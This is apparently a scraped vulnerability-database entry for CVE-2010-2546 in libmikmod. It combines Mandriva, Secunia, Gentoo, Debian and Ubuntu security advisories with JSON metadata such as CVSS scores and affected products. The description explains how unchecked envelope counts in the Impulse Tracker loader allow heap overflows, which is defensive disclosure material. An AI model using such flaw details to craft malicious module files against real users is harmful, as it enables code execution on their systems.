Mandriva Linux 2010.1/X86_64: c642403d884dcd4aef507757d7688b4a 2010.1/x86_64/lib64mikmod3-3.2.0-0.beta2.7.1mdv2010.1.x86_64.rpm b64cda55aeb0450fea2ad3af07fece31 2010.1/x86_64/lib64mikmod-devel-3.2.0-0.beta2.7.1mdv2010.1.x86_64.rpm a8e35035a0439a36aed7acb4c6cd8c66 2010.1/SRPMS/libmikmod-3.2.0-0.beta2.7.1mdv2010.1.src.rpm
Mandriva Enterprise Server 5: 6798c40fffe0cec1532ed4ea2470b041 mes5/i586/libmikmod3-3.2.0-0.beta2.2.2mdvmes5.1.i586.rpm 2b4f452bcfcd7ccbc1f9eea217b3e8ed mes5/i586/libmikmod-devel-3.2.0-0.beta2.2.2mdvmes5.1.i586.rpm 18ee204b5ffc212d4fb027b912a75c0b mes5/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdvmes5.1.src.rpm
Mandriva Enterprise Server 5/X86_64: 5e4fb9c93420186fc60c96e38b9ea412 mes5/x86_64/lib64mikmod3-3.2.0-0.beta2.2.2mdvmes5.1.x86_64.rpm e285e5b3413fe8f0de6b71caa903c8f9 mes5/x86_64/lib64mikmod-devel-3.2.0-0.beta2.2.2mdvmes5.1.x86_64.rpm 18ee204b5ffc212d4fb027b912a75c0b mes5/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdvmes5.1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFMaOgMmqjQ0CJFipgRAt6nAKCzxX60CsvAUagtg/MS8MzgHh/84wCfbLXV avaniwZZDpjBYi8uoj21mkM= =KovP -----END PGP SIGNATURE----- . ----------------------------------------------------------------------
Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch
TITLE: Gentoo update for libmikmod
SECUNIA ADVISORY ID: SA48244
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48244/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48244
RELEASE DATE: 2012-03-06
DISCUSS ADVISORY: http://secunia.com/advisories/48244/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/48244/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48244
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Gentoo has issued an update for libmikmod. This fixes two vulnerabilities, which can be exploited by malicious people to potentially compromise a vulnerable system.
ORIGINAL ADVISORY: GLSA 201203-10: http://www.gentoo.org/security/en/glsa/glsa-201203-10.xml
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201203-10
http://security.gentoo.org/
Severity: Normal Title: libmikmod: User-assisted execution of arbitrary code Date: March 06, 2012 Bugs: #335892 ID: 201203-10
Synopsis
Multiple buffer overflow vulnerabilities in libmikmod may allow an attacker to execute arbitrary code or cause a Denial of Service condition.
Workaround
There is no known workaround at this time.
Resolution
All libmikmod 3.2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=media-libs/libmikmod-3.2.0_beta2-r3"
All libmikmod 3.1 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libmikmod-3.1.12-r1"=
Packages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying some of these packages.
References
[ 1 ] CVE-2010-2546 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2546 [ 2 ] CVE-2010-2971 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2971
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201203-10.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201008-0230",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "libmikmod",
"scope": "eq",
"trust": 2.4,
"vendor": "raphael assenat",
"version": "3.1.12"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "linux lts lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.0"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.0"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.1"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.0"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.0"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2008.0"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2008.0"
},
{
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "libmikmod",
"scope": "eq",
"trust": 0.3,
"vendor": "libmikmod",
"version": "3.1.12"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux mipsel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux m68k",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux hppa",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux armel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "libmikmod",
"version": "3.1.12"
}
],
"sources": [
{
"db": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1421"
},
{
"db": "BID",
"id": "41917"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"db": "NVD",
"id": "CVE-2010-2546"
},
{
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:raphael_assenat:libmikmod:3.1.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-2546"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Tomas Hoger",
"sources": [
{
"db": "BID",
"id": "41917"
},
{
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
],
"trust": 0.9
},
"cve": "CVE-2010-2546",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2010-2546",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2010-2546",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201008-022",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"db": "NVD",
"id": "CVE-2010-2546"
},
{
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple heap-based buffer overflows in loaders/load_it.c in libmikmod, possibly 3.1.12, might allow remote attackers to execute arbitrary code via (1) crafted samples or (2) crafted instrument definitions in an Impulse Tracker file, related to panpts, pitpts, and IT_ProcessEnvelope. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-3995. libmikmod of loaders/load_it.c Contains a heap-based buffer overflow vulnerability. Libmikmod is a library used by Mikmod to play various types of audio modules. The problem with CVE-2009-3995 is not completely fixed correctly. The following problems exist: - Only volpts are checked, but similar problems affect panpts and pitpts. - Checking is done after calling IT_ProcessEnvelope, the function has modified name##env as the upper bound using name##pts, so an overflow can be triggered between checks. The -name##env information is read from name##tick and name##node, where the value contains ITENVCNT (25), so using sizeof(name##env) == ENVPOINTS (32) can still cause the array to read out of bounds. take. The \u0027libmikmod\u0027 library is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. \nAttackers can leverage these issues to execute arbitrary code in the context of an application that uses the affected library. Failed attacks will cause denial-of-service conditions. \nThese issues are due to an incomplete fix for CVE-2009-3995; BID 38114 (libmikmod Multiple Buffer Overflow Vulnerabilities) is related to these issues. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2081-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nAugust 01, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : libmikmod\nVulnerability : buffer overflow\nProblem type : local(remote)\nDebian-specific: no\nCVE Id(s) : CVE-2010-2546\n\nTomas Hoger discovered that the upstream fix for CVE-2009-3995 was\ninsufficient. This update provides a corrected package. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.1.11-6.3. \n\nWe recommend that you upgrade your libmikmod packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show \u003cpkg\u003e\u0027 and http://packages.debian.org/\u003cpkg\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niEYEARECAAYFAkxVxoUACgkQXm3vHE4uylrhwgCfXeJqgBnpGu10QyEu3DBjwWy/\ny0YAoNP/beuWGyzKeCCNXuQwZ23f0oV2\n=3XKq\n-----END PGP SIGNATURE-----\n. ===========================================================\nUbuntu Security Notice USN-995-1 September 29, 2010\nlibmikmod vulnerabilities\nCVE-2007-6720, CVE-2009-0179, CVE-2009-3995, CVE-2009-3996,\nCVE-2010-2546, CVE-2010-2971\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 8.04 LTS\nUbuntu 9.04\nUbuntu 9.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 8.04 LTS:\n libmikmod2 3.1.11-6ubuntu3.8.04.1\n\nUbuntu 9.04:\n libmikmod2 3.1.11-6ubuntu3.9.04.1\n\nUbuntu 9.10:\n libmikmod2 3.1.11-6ubuntu4.1\n\nIn general, a standard system update will make all the necessary changes. \n\nDetails follow:\n\nIt was discovered that libMikMod incorrectly handled songs with different\nchannel counts. (CVE-2007-6720)\n\nIt was discovered that libMikMod incorrectly handled certain malformed XM\nfiles. (CVE-2009-0179)\n\nIt was discovered that libMikMod incorrectly handled certain malformed\nImpulse Tracker files. (CVE-2009-3995, CVE-2010-2546, CVE-2010-2971)\n\nIt was discovered that libMikMod incorrectly handled certain malformed\nUltratracker files. (CVE-2009-3996)\n\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.8.04.1.diff.gz\n Size/MD5: 339148 88b89686ec91f5173c6dd8b80ce8e64e\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.8.04.1.dsc\n Size/MD5: 730 9d56dccce0535ee3c48ca642da04705a\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz\n Size/MD5: 611590 705106da305e8de191549f1e7393185c\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_amd64.deb\n Size/MD5: 266550 9200823b863117753bac8a1aae63c2ca\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_amd64.deb\n Size/MD5: 155628 cff0d15986f092c78cda7bb3a657e1f6\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_i386.deb\n Size/MD5: 244016 27453dd915f85ccd7dba0710ecab4acc\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_i386.deb\n Size/MD5: 146476 b67d8d50c02001e45eb618d51f4329a1\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_lpia.deb\n Size/MD5: 248392 706f9438583e4364b4265ec8d8543bc4\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_lpia.deb\n Size/MD5: 148608 5c727d7e661e44044017cb7bd6ab3402\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_powerpc.deb\n Size/MD5: 285392 c4ebd492d87451cc2979554da7e6fa34\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_powerpc.deb\n Size/MD5: 173928 e45de26f887292b7482eca418459e60c\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_sparc.deb\n Size/MD5: 258120 702fbd120d05a9f1d645f85ec45ea211\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_sparc.deb\n Size/MD5: 148446 029492bfe2015986538e1f141ab51f93\n\nUpdated packages for Ubuntu 9.04:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.9.04.1.diff.gz\n Size/MD5: 338916 a771044f7ddf578a1618e1667effd243\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.9.04.1.dsc\n Size/MD5: 1150 031a6ed819b4e9f59dc4614f42f91109\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz\n Size/MD5: 611590 705106da305e8de191549f1e7393185c\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_amd64.deb\n Size/MD5: 265286 5189d1d5a185819b8f0a3860fd3ecc2b\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_amd64.deb\n Size/MD5: 156988 f76e952924eceebdde01d9671f96b9b9\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_i386.deb\n Size/MD5: 244312 00502a3a984d2b40bffdf46d016caa20\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_i386.deb\n Size/MD5: 147096 8cb46dd80877e60c1300e0b471a42cba\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_lpia.deb\n Size/MD5: 247818 33fa14fe4ee9a538eb1c998928a302ab\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_lpia.deb\n Size/MD5: 148464 75e5cde38085b939f4c3ad709f2a6b0d\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_powerpc.deb\n Size/MD5: 281656 34e746a50fbd0acd34192b9e899e161f\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_powerpc.deb\n Size/MD5: 172672 69ec0a2145ea106602c2f3fa454bc346\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_sparc.deb\n Size/MD5: 255260 70cb1b7d5521b00ae993686d9336bb12\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_sparc.deb\n Size/MD5: 149422 d9e458beb786bbe71ecbf51f3ba6e758\n\nUpdated packages for Ubuntu 9.10:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu4.1.diff.gz\n Size/MD5: 338972 b044cd4c0262d4d38fc94de90fb520d4\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu4.1.dsc\n Size/MD5: 1130 1feb8d8fcb433337e8ddad65e2076e4a\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz\n Size/MD5: 611590 705106da305e8de191549f1e7393185c\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_amd64.deb\n Size/MD5: 267300 627cc54b1a4b2ed57ae5c1de295e614c\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_amd64.deb\n Size/MD5: 157340 c36998f34e2807dbb8af42934b8ede5e\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_i386.deb\n Size/MD5: 244300 063e16e7e89f79a9d8b457a3881b5820\n http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_i386.deb\n Size/MD5: 148654 615e8ada1a87f7aee7e5ccd51c2dca4e\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_lpia.deb\n Size/MD5: 247994 fe717add1af434a346b59982f5e3c7c5\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_lpia.deb\n Size/MD5: 151404 e13a0f651953441fc9cc5958ef874d0d\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_powerpc.deb\n Size/MD5: 281960 9199bd4701581881b31df45c5ede258f\n 